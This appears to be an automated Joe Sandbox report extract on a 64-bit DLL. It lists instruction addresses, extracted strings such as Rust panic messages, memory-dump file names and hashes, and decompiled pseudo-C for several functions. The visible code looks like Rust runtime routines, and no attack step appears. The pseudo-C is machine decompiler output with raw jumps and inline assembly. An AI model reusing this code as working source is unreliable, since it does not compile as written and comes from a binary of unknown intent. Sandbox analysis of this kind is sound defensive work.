0x7fef30c0dce
0x7fef30c0dd1
0x7fef30c0dd5
0x7fef30c0dd9
0x7fef30c0ddd
0x7fef30c0def
0x7fef30c0df3
0x7fef30c0df9
0x7fef30c0e07
0x7fef30c0e0f
0x7fef30c0e25
0x7fef30c0e2b
0x7fef30c0e41
0x7fef30c0e4e
0x7fef30c0e5a
0x7fef30c0e5f
0x7fef30c0e64
0x7fef30c0e69
0x7fef30c0e74
0x7fef30c0e79
0x7fef30c0e7e
0x7fef30c0e83
0x7fef30c0e91
0x7fef30c0e94
0x7fef30c0e9a
0x7fef30c0e9f
0x7fef30c0ea4
0x7fef30c0ebe
0x7fef30c0ec2
0x7fef30c0ec7
0x7fef30c0ecb
0x7fef30c0ed2
0x7fef30c0ed7
0x7fef30c0edf
0x7fef30c0ee3
0x7fef30c0ee7
0x7fef30c0eeb
0x7fef30c0ef2
0x7fef30c0ef7
0x7fef30c0efc
0x7fef30c0f04
0x7fef30c0f09
0x7fef30c0f18
0x7fef30c0f27
0x7fef30c0f3f
0x7fef30c0f49
0x7fef30c0f4b
0x7fef30c0f4f
0x7fef30c0f6a
0x7fef30c0f70
0x7fef30c0f78
0x7fef30c0f7a
0x7fef30c0f85
0x7fef30c0f90
0x7fef30c0f94
0x7fef30c0f98
0x7fef30c0f9c
0x7fef30c0fa0
0x7fef30c0fa8
0x7fef30c0fb2
0x7fef30c0fbe
0x7fef30c0fc8
0x7fef30c0fd0
0x7fef30c0fd8
0x7fef30c0fdc
0x7fef30c0fe4
0x7fef30c0fe8
0x7fef30c0ffa
0x7fef30c1000
0x7fef30c1008
0x7fef30c1018
0x7fef30c101c
0x7fef30c101f
0x7fef30c102a
0x7fef30c102f
0x7fef30c1032
0x7fef30c1035
0x7fef30c1050
0x7fef30c105b
0x7fef30c1068
0x7fef30c106d
0x7fef30c1076
0x7fef30c1080
0x7fef30c1085
0x7fef30c108d
0x7fef30c109f
0x7fef30c10b6
0x7fef30c10c3
0x7fef30c10c7
0x7fef30c10cc
0x7fef30c10d1
0x7fef30c10de
0x7fef30c10ec
0x7fef30c10f4
0x7fef30c10fc
0x7fef30c1101
0x7fef30c110a
0x7fef30c1112
0x7fef30c111e
0x7fef30c112d
0x7fef30c1134
0x7fef30c1140
0x7fef30c1145
0x7fef30c114f
0x7fef30c1153
0x7fef30c1157
0x7fef30c1166
0x7fef30c116b
0x7fef30c1170
0x7fef30c1178
0x7fef30c1183
0x7fef30c1186
0x7fef30c118b
0x7fef30c1193
0x7fef30c1197
0x7fef30c119b
0x7fef30c11a6
0x7fef30c11a8
0x7fef30c11b0
0x7fef30c11b8
0x7fef30c11bc
0x7fef30c11c0
0x7fef30c11c8
0x7fef30c11d4
0x7fef30c11d8
0x7fef30c11da
0x7fef30c11ef
0x7fef30c11f3
0x7fef30c11f8
0x7fef30c1202
0x7fef30c1208
0x7fef30c120d
0x7fef30c1212
0x7fef30c1217
0x7fef30c1225
0x7fef30c1228
0x7fef30c122e
0x7fef30c1238
0x7fef30c1241
0x7fef30c1244
0x7fef30c1252
0x7fef30c1265
0x7fef30c126b
0x7fef30c1270
0x7fef30c1284
0x7fef30c1288
0x7fef30c128d
0x7fef30c1291
0x7fef30c1299
0x7fef30c12a8
0x7fef30c12ac
0x7fef30c12b4
0x7fef30c12b8
0x7fef30c12bc
0x7fef30c12c0
0x7fef30c12c4
0x7fef30c12c8
0x7fef30c12d3
0x7fef30c12d7
0x7fef30c12e0
0x7fef30c12ea
0x7fef30c12f2
0x7fef30c12f6
0x7fef30c12ff
0x7fef30c1309
0x7fef30c1312
0x7fef30c131b
0x7fef30c131d
0x7fef30c1322
0x7fef30c1328
0x7fef30c132d
0x7fef30c1330
0x7fef30c1335
0x7fef30c133b
0x7fef30c1340
0x7fef30c134b
0x7fef30c1354
0x7fef30c1359
0x7fef30c135f
0x7fef30c1361
0x7fef30c1366
0x7fef30c136e
0x7fef30c1379
0x7fef30c1387
0x7fef30c138d
0x7fef30c1395
0x7fef30c139d
0x7fef30c13bf
0x7fef30c13c5
0x7fef30c13c7
0x7fef30c13ce
0x7fef30c13d9
0x7fef30c13db
0x7fef30c13f0
0x7fef30c13f5
0x7fef30c13f7
0x7fef30c13fc
0x7fef30c13ff
0x7fef30c1406
0x7fef30c1413
0x7fef30c1418
0x7fef30c141b
0x7fef30c1420
0x7fef30c1429
0x7fef30c142d
0x7fef30c1432
0x7fef30c1437
0x7fef30c144c
0x7fef30c1451
0x7fef30c145f
0x7fef30c1468
0x7fef30c146e
0x7fef30c1476
0x7fef30c147c
0x7fef30c1484
0x7fef30c1486
0x7fef30c148a
0x7fef30c149f
0x7fef30c14a4
0x7fef30c14ac
0x7fef30c14ae
0x7fef30c14b2
0x7fef30c14c7
0x7fef30c14cc
0x7fef30c14ce
0x7fef30c14db
0x7fef30c14e1
0x7fef30c14e3
0x7fef30c14e8
0x7fef30c14f7
0x7fef30c1500
0x7fef30c150a
0x7fef30c150d
0x7fef30c1512
0x7fef30c1517
0x7fef30c1522
0x7fef30c1525
0x7fef30c152d
0x7fef30c1533
0x7fef30c153a
0x7fef30c153d
0x7fef30c153f
0x7fef30c1546
0x7fef30c154b
0x7fef30c154d
0x7fef30c1554
0x7fef30c156d
0x7fef30c1572
0x7fef30c1576
0x7fef30c157b
0x7fef30c157e
0x7fef30c1586
0x7fef30c1594
0x7fef30c1598
0x7fef30c159f
0x7fef30c15a2
0x7fef30c15a5
0x7fef30c15a8
0x7fef30c15ac
0x7fef30c15af
0x7fef30c15b5
0x7fef30c15b9
0x7fef30c15be
0x7fef30c15c1
0x7fef30c15c3
0x7fef30c15c9
0x7fef30c15d2
0x7fef30c15dc
0x7fef30c15e0
0x7fef30c15e5
0x7fef30c15e9
0x7fef30c15ed
0x7fef30c15f1
0x7fef30c15f9
0x7fef30c1607
0x7fef30c160c
0x7fef30c1610
0x7fef30c1614
0x7fef30c161c
0x7fef30c1620
0x7fef30c1629
0x7fef30c1633
0x7fef30c163c
0x7fef30c1649
0x7fef30c1654
0x7fef30c165a
0x7fef30c166f
0x7fef30c1674
0x7fef30c167f
0x7fef30c1684
0x7fef30c1689
0x7fef30c168e
0x7fef30c1691
0x7fef30c169f
0x7fef30c16a2
0x7fef30c16a5
0x7fef30c16aa
0x7fef30c16ac
0x7fef30c16af
0x7fef30c16b5
0x7fef30c16c5
0x7fef30c16ca
0x7fef30c16ce
0x7fef30c16d3
0x7fef30c16da
0x7fef30c16de
0x7fef30c16e2
0x7fef30c16ea
0x7fef30c16f4
0x7fef30c16f8
0x7fef30c16fc
0x7fef30c1700
0x7fef30c1704
0x7fef30c1708
0x7fef30c170c
0x7fef30c1710
0x7fef30c1714
0x7fef30c1719
0x7fef30c1722
0x7fef30c1727
0x7fef30c1747
0x7fef30c1754
0x7fef30c1758
0x7fef30c175d
0x7fef30c176a
0x7fef30c177c
0x7fef30c1785
0x7fef30c1788
0x7fef30c178c
0x7fef30c1790
0x7fef30c1794
0x7fef30c179b
0x7fef30c17a3
0x7fef30c17a6
0x7fef30c17aa
0x7fef30c17b5
0x7fef30c17ba
0x7fef30c17bf
0x7fef30c17c3
0x7fef30c17c8
0x7fef30c17cd
0x7fef30c17d2
0x7fef30c17d7
0x7fef30c17dc
0x7fef30c17e7
0x7fef30c17ea
0x7fef30c1803

APIs

HeapFree.KERNEL32 ref: 000007FEF30C0CE0
HeapFree.KERNEL32 ref: 000007FEF30C1265
HeapFree.KERNEL32 ref: 000007FEF30C1387

Strings

file://, xrefs: 000007FEF30C0C15, 000007FEF30C0D54
localhos, xrefs: 000007FEF30C0F51
assertion failed: self.is_char_boundary(start), xrefs: 000007FEF30C148C
called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30C1804, 000007FEF30C1814
assertion failed: self.is_char_boundary(end), xrefs: 000007FEF30C14B4

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID: assertion failed: self.is_char_boundary(end)$assertion failed: self.is_char_boundary(start)$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$file://$localhos
API String ID: 3298025750-1012908559
Opcode ID: 10c12e2a7ed75a507718b4b4b97e813561be6ab73f534d682904a275b11965ac
Instruction ID: c036da3bd80c64d3e06e6f7c12a3a7b4e422e1a16a490049dfd61d06e79d8f98
Opcode Fuzzy Hash: 10c12e2a7ed75a507718b4b4b97e813561be6ab73f534d682904a275b11965ac
Instruction Fuzzy Hash: A9728D72A08B828AE7A4CB15E4447A977E6F789BC4F448123DF8D43BA5DB3CE195D700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF306AE60 Relevance: 12.5, APIs: 3, Strings: 5, Instructions: 494
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 19%

			E000007FE7FEF306AE60(void* __rcx, intOrPtr* __rdx) {
				char _v192;
				char _v264;
				long long _v272;
				long long _v280;
				void* _t12;
				long long _t18;

				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x60], xmm0");
				asm("movaps [esp+0x50], xmm0");
				asm("movaps [esp+0x40], xmm0");
				asm("movaps [esp+0x30], xmm0");
				_t18 =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x18))));
				if (_t18 - 0x41 >= 0) goto 0xf306aefd;
				_v272 =  *((intOrPtr*)(__rdx + 0x20));
				_v280 = _t18;
				_t12 = E000007FE7FEF3069854( *__rdx,  *((intOrPtr*)(__rdx + 8)),  *((intOrPtr*)(__rdx + 0x10)),  &_v264);
				if (_t12 != 0) goto 0xf306af13;
				0xf306aaa0();
				if ( *((long long*)( &_v192 + 0x48)) == 0) goto 0xf306af1f;
				r8d = 0xa0;
				E000007FE7FEF30F1E10();
				return _t12;
			}

0x7fef306ae85
0x7fef306ae88
0x7fef306ae8d
0x7fef306ae92
0x7fef306ae97
0x7fef306ae9c
0x7fef306aea3
0x7fef306aea5
0x7fef306aeaa
0x7fef306aeb4
0x7fef306aebb
0x7fef306aed0
0x7fef306aeda
0x7fef306aee1
0x7fef306aeea
0x7fef306aefc

APIs

HeapFree.KERNEL32 ref: 000007FEF306B09B

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 000007FEF306AF2B
assertion failed: n_min_bits >= N_MIN_BITS, xrefs: 000007FEF306B62A
assertion failed: padding.iter().all(|&b| b == 0), xrefs: 000007FEF306B55D
@, xrefs: 000007FEF306B0EF
assertion failed: mid <= self.len(), xrefs: 000007FEF306B69E

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID: @$assertion failed: mid <= self.len()$assertion failed: n_min_bits >= N_MIN_BITS$assertion failed: padding.iter().all(|&b| b == 0)$called `Result::unwrap()` on an `Err` value
API String ID: 3298025750-3221909787
Opcode ID: 819df31f9223344ed38f6d91fbbb91e06675d7700725ee66736d69d3cd968a98
Instruction ID: c8ded7a2ea300faf808eded9f0d9ed71e9288ceda01abc01caa832df11fdf786
Opcode Fuzzy Hash: 819df31f9223344ed38f6d91fbbb91e06675d7700725ee66736d69d3cd968a98
Instruction Fuzzy Hash: 5622A472A0DB8189EAA09B16E4403EAA3E5F784790F544133EF9D13BA9DF7CD585E700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30526F7 Relevance: 11.2, APIs: 3, Strings: 4, Instructions: 738
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E000007FE7FEF30526F7(long long __rcx, long long __rdx) {
				void* _t307;
				void* _t309;
				signed int _t314;
				signed int _t320;
				unsigned int _t327;
				signed char _t339;
				unsigned int _t343;
				intOrPtr _t348;
				void* _t357;
				void* _t365;
				void* _t374;
				signed int _t391;
				void* _t409;
				long long _t451;
				long long _t455;
				intOrPtr* _t468;
				long long _t473;
				signed long long _t477;
				long long _t481;
				long long _t483;
				intOrPtr _t493;
				intOrPtr _t498;
				intOrPtr _t500;
				long long _t503;
				long long _t505;
				long long _t507;
				void* _t508;
				long long _t510;
				void* _t511;
				intOrPtr* _t512;
				intOrPtr* _t513;
				intOrPtr _t514;
				long long _t515;
				void* _t548;
				void* _t555;
				long long _t564;
				intOrPtr _t581;
				void* _t592;
				long long _t593;
				long long _t595;
				long long _t597;
				signed long long _t600;
				long long _t603;
				intOrPtr* _t604;
				intOrPtr _t606;
				intOrPtr _t607;
				void* _t609;
				long long _t616;
				intOrPtr* _t618;
				intOrPtr* _t619;
				intOrPtr _t620;
				intOrPtr* _t621;
				intOrPtr _t623;
				intOrPtr _t624;
				long long _t626;
				intOrPtr _t629;
				intOrPtr _t632;
				void* _t633;
				void* _t634;
				long long* _t635;
				long long _t636;
				long long* _t644;
				long long* _t645;
				long long* _t646;
				long long* _t654;
				void* _t657;
				intOrPtr _t661;
				intOrPtr _t663;
				long long _t669;
				long long _t675;
				long long _t679;
				intOrPtr _t680;
				long long _t685;
				intOrPtr _t690;
				intOrPtr _t691;
				intOrPtr* _t692;

				_t633 = _t634 + 0x80;
				 *((long long*)(_t633 + 0x1a0)) = 0xfffffffe;
				_t616 = __rdx;
				_t595 = __rcx;
				_t451 =  *((intOrPtr*)(__rcx));
				 *((intOrPtr*)(_t451 + 8))();
				 *((long long*)(_t633 + 0xd0)) = _t451;
				 *((long long*)(_t633 + 0xd8)) = __rdx;
				if (( *(__rdx + 0x30) & 0x00000004) != 0) goto 0xf30529b2;
				_t503 = _t633 + 0xe0;
				 *_t503 = _t633 + 0xd0;
				 *((long long*)(_t503 + 8)) = 0x7fef3051fed;
				_t564 =  *((intOrPtr*)(__rdx + 0x28));
				_t635 = _t633 + 0x130;
				 *_t635 = 0xf314d790;
				 *((long long*)(_t635 + 8)) = 0xf314d790;
				 *((long long*)(_t635 + 0x10)) = 0;
				 *((long long*)(_t635 + 0x20)) = _t503;
				 *((long long*)(_t635 + 0x28)) = 0xf314d790;
				if (E000007FE7FEF3054B50(_t357,  *((intOrPtr*)(__rdx + 0x20)), _t564, _t635) != 0) goto 0xf305329a;
				 *((long long*)(_t633 + 0x78)) = _t595;
				 *((long long*)(_t633 + 0x198)) = _t616;
				_t455 =  *((intOrPtr*)(_t633 + 0xd8));
				 *((intOrPtr*)(_t455 + 0x30))();
				if (_t455 == 0) goto 0xf3052962;
				_t669 = _t455;
				_t685 = _t564;
				_t636 = _t633 + 0x130;
				 *_t636 = 0xf3104260;
				 *((long long*)(_t636 + 8)) = 1;
				 *((long long*)(_t636 + 0x10)) = 0xf3104260;
				 *((long long*)(_t636 + 0x20)) = "called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value";
				 *((long long*)(_t636 + 0x28)) = 0xf3104260;
				if (E000007FE7FEF3054B50(_t357,  *((intOrPtr*)( *((intOrPtr*)(_t633 + 0x198)) + 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t633 + 0x198)) + 0x28)), _t636) != 0) goto 0xf3053274;
				 *((intOrPtr*)(_t685 + 0x30))();
				 *((long long*)(_t633 + 0x120)) = 0xf3104260;
				 *((long long*)(_t633 + 0x128)) = _t669;
				_t505 =  *((intOrPtr*)(_t633 + 0x198));
				 *((intOrPtr*)(_t685 + 0x30))();
				 *((long long*)(_t633 + 0x80)) = _t669;
				 *((long long*)(_t633 + 0x88)) = _t685;
				 *((long long*)(_t633 + 0x130)) = 0xf3126470;
				 *((long long*)(_t633 + 0x138)) = 1;
				r8d = 0;
				 *((long long*)(_t633 + 0x140)) = _t636;
				 *((long long*)(_t633 + 0x150)) = "called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value";
				 *((long long*)(_t633 + 0x158)) = _t636;
				if (E000007FE7FEF3054B50(_t357,  *((intOrPtr*)(_t505 + 0x20)),  *((intOrPtr*)(_t505 + 0x28)), _t633 + 0x130) != 0) goto 0xf3053274;
				_t617 =  !=  ? _t595 : _t616;
				 *((long long*)(_t633 + 0xe0)) = _t505;
				 *((long long*)(_t633 + 0xe8)) =  *((intOrPtr*)(_t633 + 0x128));
				 *((long long*)(_t633 + 0xf0)) =  !=  ? _t595 : _t616;
				 *((char*)(_t633 + 0xf8)) = 0;
				 *((long long*)(_t633 + 0x10)) = _t633 + 0x80;
				 *((long long*)(_t633 + 0x18)) = 0x7fef3051fed;
				 *((long long*)(_t633 + 0x50)) = _t633 + 0xe0;
				 *((long long*)(_t633 + 0x130)) = 0xf314d790;
				 *((long long*)(_t633 + 0x138)) = 0xf314d790;
				 *((long long*)(_t633 + 0x140)) = 0;
				 *((long long*)(_t633 + 0x150)) = _t633 + 0x10;
				 *((long long*)(_t633 + 0x158)) = 0xf314d790;
				if (E000007FE7FEF3054B50(_t357, _t633 + 0x50, 0xf3104028, _t633 + 0x130) != 0) goto 0xf3053274;
				if (0xf3104260 != 0) goto 0xf305283c;
				_t618 =  *((intOrPtr*)(_t633 + 0x78));
				if ( *((intOrPtr*)(_t618 + 8)) != 3) goto 0xf30529c2;
				 *((intOrPtr*)( *_t618 + 8))();
				_t619 = _t633 + 0x130;
				 *_t619 = 0;
				 *0x7FEF3104078();
				_t620 =  *_t619;
				if (_t620 == 0) goto 0xf3053328;
				goto 0xf30529cd;
				_t468 = _t619;
				 *((intOrPtr*)(_t468 + 0x18))();
				goto 0xf305329a;
				_t621 = _t620 + 8;
				if (_t468 != 2) goto 0xf3053298;
				_t597 = _t633 + 0x180;
				 *_t597 = 1;
				asm("pxor xmm0, xmm0");
				asm("movdqu [edi+0x8], xmm0");
				 *(_t633 + 0x40) = 0;
				 *((char*)(_t633 + 0x48)) = 3;
				 *((long long*)(_t633 + 0x10)) = 0;
				 *((long long*)(_t633 + 0x20)) = 0;
				 *((long long*)(_t633 + 0x30)) = _t597;
				 *((long long*)(_t633 + 0x38)) = 0xf3103fd8;
				if ( *_t621 == 0) goto 0xf3052a3c;
				if (0 != 1) goto 0xf3052a62;
				r8d = 0x12;
				goto 0xf3052a50;
				r8d = 0x15;
				if (E000007FE7FEF30534CB(0 - 1,  &M000007FE7FEF31252BA, 0xf3104008) == 0) goto 0xf3052d62;
				goto 0xf30532fb;
				if ( *((intOrPtr*)(_t621 + 8)) != 3) goto 0xf3052f7e;
				_t391 =  *(_t633 + 0x40) & 0x00000004;
				if (_t391 != 0) goto 0xf3052a99;
				if (_t391 < 0) goto 0xf3053342;
				goto 0xf3052aa3;
				_t690 =  *((intOrPtr*)(_t621 + 0x18));
				_t600 =  *((intOrPtr*)(_t621 + 0x28));
				E000007FE7FEF30999F0(_t365,  *((intOrPtr*)(_t621 + 8)), _t633 - 0x40, 0xf3104008);
				_t473 = _t633 - 0x20;
				 *((char*)(_t473 + 0x20)) = 1;
				asm("movdqu xmm0, [esi]");
				asm("movups xmm1, [esi+0x10]");
				asm("movdqa [eax], xmm0");
				asm("movaps [eax+0x10], xmm1");
				 *((long long*)(_t633 + 0x50)) = _t633 + 0x10;
				 *((long long*)(_t633 + 0x58)) = 0;
				 *((char*)(_t633 + 0x70)) = 1;
				 *((long long*)(_t633 + 0x60)) = _t473;
				 *((long long*)(_t633 + 0x68)) = 0xf3125280;
				if (_t600 == 0) goto 0xf3052d52;
				_t623 = _t690;
				 *((long long*)(_t633 + 0x128)) = _t600 * 0x138 + _t690;
				_t477 =  *((intOrPtr*)(_t623 + 0x130));
				if (_t477 == 0) goto 0xf3052cd0;
				_t691 =  *((intOrPtr*)(_t623 + 0x120));
				 *((long long*)(_t633 + 0x120)) = _t691 + (_t477 + _t477 * 8) * 8;
				_t692 = _t691 + 0x30;
				 *((long long*)(_t633 + 0xc0)) = _t633 + 0x50;
				 *((long long*)(_t633 + 0xc8)) = 0;
				_t507 =  *((intOrPtr*)(_t692 - 0x30));
				if (_t507 == 0) goto 0xf3052c26;
				_t679 =  *((intOrPtr*)(_t692 - 0x20));
				E000007FE7FEF3055320(_t633 + 0xe0, _t507, _t679, _t657);
				r12d = 2;
				if ( *((long long*)(_t633 + 0xe0)) != 0) goto 0xf3052be2;
				if ( *((intOrPtr*)(_t633 + 0xe8)) == 0) goto 0xf3052be2;
				E000007FE7FEF30708F0(1, 0, _t365, _t374, _t633 + 0xe0,  *((intOrPtr*)(_t633 + 0xe8)),  *((intOrPtr*)(_t633 + 0xf0)));
				_t481 =  *((intOrPtr*)(_t633 + 0xe0));
				if (_t481 == 2) goto 0xf3052be2;
				 *((long long*)(_t633 + 0xb0)) =  *((intOrPtr*)(_t633 + 0x118));
				asm("movdqu xmm0, [edx]");
				asm("movups xmm1, [edx+0x10]");
				asm("movups xmm2, [edx+0x20]");
				asm("movaps [ebp+0xa0], xmm2");
				asm("movaps [ebp+0x90], xmm1");
				asm("movdqa [ebp+0x80], xmm0");
				 *((long long*)(_t633 + 0x178)) =  *((intOrPtr*)(_t633 + 0xb0));
				asm("movdqa xmm0, [ebp+0x80]");
				asm("movaps xmm1, [ebp+0x90]");
				asm("movaps xmm2, [ebp+0xa0]");
				asm("movups [ecx+0x20], xmm2");
				asm("movups [ecx+0x10], xmm1");
				asm("movdqu [ecx], xmm0");
				 *((long long*)(_t633 + 0x130)) = _t507;
				 *((long long*)(_t633 + 0x138)) = _t679;
				goto 0xf3052c2c;
				r12d = 3;
				_t508 = _t692 - 0x30;
				 *((long long*)(_t633 + 0x140)) = _t481;
				_t483 =  *((intOrPtr*)(_t508 + 0x18));
				if (_t483 != 2) goto 0xf3052c4e;
				 *((long long*)(_t633 + 0xe0)) = 2;
				goto 0xf3052c6a;
				 *((long long*)(_t633 + 0xe0)) = _t483;
				 *((long long*)(_t633 + 0xe8)) =  *((intOrPtr*)(_t692 - 0x10));
				 *((long long*)(_t633 + 0xf0)) =  *_t692;
				_t348 =  *((intOrPtr*)(_t508 + 0x3c));
				 *((intOrPtr*)(_t634 + 0x38)) =  *((intOrPtr*)(_t508 + 0x44));
				 *((intOrPtr*)(_t634 + 0x30)) =  *((intOrPtr*)(_t508 + 0x40));
				 *((intOrPtr*)(_t634 + 0x28)) = _t348;
				 *((intOrPtr*)(_t634 + 0x20)) =  *((intOrPtr*)(_t508 + 0x38));
				_t307 = E000007FE7FEF309E390(_t633 + 0xc0,  *((intOrPtr*)(_t623 + 8)), _t633 + 0x130, _t633 + 0xe0);
				 *((long long*)( *((intOrPtr*)(_t633 + 0xc0)) + 8)) =  *((long long*)( *((intOrPtr*)(_t633 + 0xc0)) + 8)) + 1;
				if (_t307 != 0) goto 0xf30532f2;
				_t624 = _t623;
				if (_t508 + 0x48 !=  *((intOrPtr*)(_t633 + 0x120))) goto 0xf3052b32;
				goto 0xf3052d37;
				 *((long long*)(_t633 + 0x80)) = _t633 + 0x50;
				 *((long long*)(_t633 + 0x88)) = 0;
				 *((long long*)(_t633 + 0x140)) = 3;
				 *((long long*)(_t633 + 0xe0)) = 2;
				 *((intOrPtr*)(_t634 + 0x30)) = 0;
				 *((intOrPtr*)(_t634 + 0x20)) = 0;
				_t309 = E000007FE7FEF309E390(_t633 + 0x80,  *((intOrPtr*)(_t624 + 8)), _t633 + 0x130, _t633 + 0xe0);
				 *((long long*)( *((intOrPtr*)(_t633 + 0x80)) + 8)) =  *((long long*)( *((intOrPtr*)(_t633 + 0x80)) + 8)) + 1;
				if (_t309 != 0) goto 0xf30532f2;
				_t680 =  *((intOrPtr*)(_t633 + 0x198));
				if (_t624 + 0x138 !=  *((intOrPtr*)(_t633 + 0x128))) goto 0xf3052b05;
				E000007FE7FEF309AAF0( *((intOrPtr*)(_t508 + 0x40)), _t633 - 0x20);
				_t644 = _t633 + 0x130;
				 *_t644 = 0xf3104278;
				 *((long long*)(_t644 + 8)) = 1;
				 *((long long*)(_t644 + 0x10)) = 0xf3104278;
				_t626 = "called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value";
				 *((long long*)(_t644 + 0x20)) = _t626;
				 *((long long*)(_t644 + 0x28)) = 0xf3104278;
				if (E000007FE7FEF3054B50( *((intOrPtr*)(_t508 + 0x40)),  *((intOrPtr*)(_t680 + 0x20)),  *((intOrPtr*)(_t680 + 0x28)), _t644) != 0) goto 0xf3053254;
				if ( *((intOrPtr*)(_t633 + 0x190)) - 0x10 < 0) goto 0xf3052dd1;
				asm("movdqu xmm0, [eax]");
				asm("pcmpeqb xmm0, [0xaf36b]");
				asm("pmovmskb ecx, xmm0");
				if (_t348 == 0xffff) goto 0xf3052e12;
				_t581 =  *((intOrPtr*)(_t680 + 0x28));
				_t645 = _t633 + 0x130;
				 *_t645 = 0xf31042a0;
				 *((long long*)(_t645 + 8)) = 1;
				 *((long long*)(_t645 + 0x10)) = 0xf31042a0;
				 *((long long*)(_t645 + 0x20)) = _t626;
				 *((long long*)(_t645 + 0x28)) = 0xf31042a0;
				_t314 = E000007FE7FEF3054B50( *((intOrPtr*)(_t508 + 0x40)),  *((intOrPtr*)(_t680 + 0x20)), _t581, _t645);
				if (_t314 == 0) goto 0xf30530d2;
				goto 0xf3053254;
				if ( *((char*)(0x7fef31042a1)) - 0xc0 < 0) goto 0xf3053350;
				 *((long long*)(_t633 + 0x190)) = 0;
				_t646 = _t633 + 0x158;
				 *((long long*)(_t646 - 0x28)) = 1;
				 *((long long*)(_t646 - 0x20)) = _t581 - 1;
				 *((long long*)(_t646 - 0x10)) = 0x7fef31042a1;
				 *((long long*)(_t646 - 8)) = _t633 + 0x180;
				_t603 = "SStack backtrace:\n";
				 *_t646 = _t603;
				_t510 =  &M000007FE7FEF3104289;
				 *((long long*)(_t646 + 8)) = _t510;
				 *((long long*)(_t646 - 0x18)) = 0x7fef31042a1;
				if (_t510 == 1) goto 0xf3053082;
				 *((char*)(0xf31042a0 + _t510)) =  *((intOrPtr*)(_t510 + _t603));
				 *((long long*)(_t633 + 0x190)) =  *((long long*)(_t633 + 0x190)) + 1;
				_t511 = _t510 + 1;
				_t409 = _t511 - 1;
				if (_t409 != 0) goto 0xf3052e6a;
				_t604 = _t603 + _t511;
				_t204 = _t511 - 1; // 0x0
				 *((long long*)(_t633 + 0x158)) = _t604;
				if (_t409 == 0) goto 0xf3052fb9;
				r15d = 1;
				if ( *((intOrPtr*)(_t633 + 0x188)) - _t581 - _t692 + 0x48 - _t511 < 0) goto 0xf30532ce;
				r14d = 2;
				E000007FE7FEF30F1E10();
				 *((long long*)(_t633 + 0x130)) = _t680 - _t511;
				_t493 =  *((intOrPtr*)(_t633 + 0x190));
				_t548 = _t493 + _t511;
				if (_t548 == 2) goto 0xf3052f50;
				if ( ~_t204 == 0) goto 0xf3053082;
				 *((char*)( *((intOrPtr*)(_t633 + 0x180)) + _t493)) =  *_t604;
				 *((long long*)(_t633 + 0x190)) =  *((long long*)(_t633 + 0x190)) + 1;
				if (_t493 != _t548 - _t511 - 1) goto 0xf3052f19;
				 *((long long*)(_t633 + 0x158)) = _t604 + 1;
				if (0xffffffff < 0) goto 0xf305336a;
				sil = _t314 & 0xffffff00 | 0xffffffff > 0x00000000;
				E000007FE7FEF305A520();
				if (_t493 == 0) goto 0xf3053371;
				goto 0xf3052fc1;
				 *((long long*)(_t633 + 0xe0)) = _t626 - 1 +  *((intOrPtr*)(_t633 + 0x180)) + 8;
				 *((long long*)(_t633 + 0x130)) = _t633 + 0xe0;
				 *((long long*)(_t634 + 0x20)) = 0xf31252d0;
				E000007FE7FEF30FF1C0(0, 0, _t626 - 1 +  *((intOrPtr*)(_t633 + 0x180)) + 8, _t633 + 0x130, 0xf3125c70);
				goto 0xf3052a70;
				r15d = 0;
				_t512 = _t633 + 0xe0;
				 *_t512 = 0xf31252d0;
				 *((long long*)(_t512 + 8)) = 0xffffffff;
				 *((long long*)(_t512 + 0x10)) = 0;
				E000007FE7FEF3051DF1(1, _t512, _t633 + 0x130);
				_t606 =  *((intOrPtr*)(_t512 + 0x10));
				if (_t606 == 0) goto 0xf3053064;
				_t513 =  *((intOrPtr*)(_t633 + 0x150));
				_t629 =  *((intOrPtr*)(_t633 + 0x130));
				if ( *((intOrPtr*)(_t513 + 8)) -  *((intOrPtr*)(_t633 + 0x138)) + _t629 - _t606 < 0) goto 0xf30532e2;
				_t675 = _t629 + _t606;
				_t555 =  *_t513 + _t675;
				E000007FE7FEF30F1E10();
				 *((long long*)(_t633 + 0x130)) = _t675;
				_t498 =  *((intOrPtr*)(_t513 + 0x10));
				if (_t498 == _t675) goto 0xf3053064;
				if (_t606 == _t555) goto 0xf3053064;
				 *((char*)(_t498 +  *_t513 + _t555)) =  *((intOrPtr*)( *_t512 + _t555));
